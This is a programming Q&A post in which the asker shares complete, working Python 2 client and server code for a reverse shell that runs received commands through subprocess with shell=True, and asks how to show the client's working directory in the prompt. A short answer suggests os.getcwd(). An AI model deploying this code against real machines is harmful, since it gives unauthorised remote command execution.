# set current working directory as input prompt in a Python reverse shell

Tags: python, shell, input, reverse, prompt

This is my simple reverse shell written in python. I'm trying to make it better.

Client side code:

```
import socket
import subprocess

mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
mySocket.connect(('172.16.1.30', 7071))
cmd=mySocket.recv(100)

while (cmd != 'exit'):
    cmdResult = subprocess.Popen(args=cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    mySocket.send(cmdResult.communicate()[0])
    cmd = mySocket.recv(100)

mySocket.send('Shell closed by user.')
mySocket.close()
```

Server side code:

```
import socket

mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
mySocket.bind(('172.16.1.30', 7071))
mySocket.listen(1)
clntConn, clntAddr = mySocket.accept()
print 'Received connection from ' + str(clntAddr[0]) + ':' + str(clntAddr[1])

while True:
    command=raw_input('Shell>')
    clntConn.send(command)
    result=clntConn.recv(1024)
    if (result == 'Shell closed by user.'):
        print result
        exit(0)
    else:
        print result
```

As seen in "Server side code" the **raw_input** prompt is "Shell".
how can I change it to current working directory on the Client.

For example if the Client current working directory is "C:\Users\Test\Desktop\"

I had a raw_input prompt as "C:\Users\Test\Desktop>".

Thanks.

Answer (score 0):

You can use [os.getcwd()](https://docs.python.org/2/library/os.html#os-file-dir), it should work on both Unix and Windows.

```
import os
cwd = os.getcwd()
```

Comment: I wanted to have client side current working directory, not the server side.

Comment: Then run the command within the client. Still, the command is the same.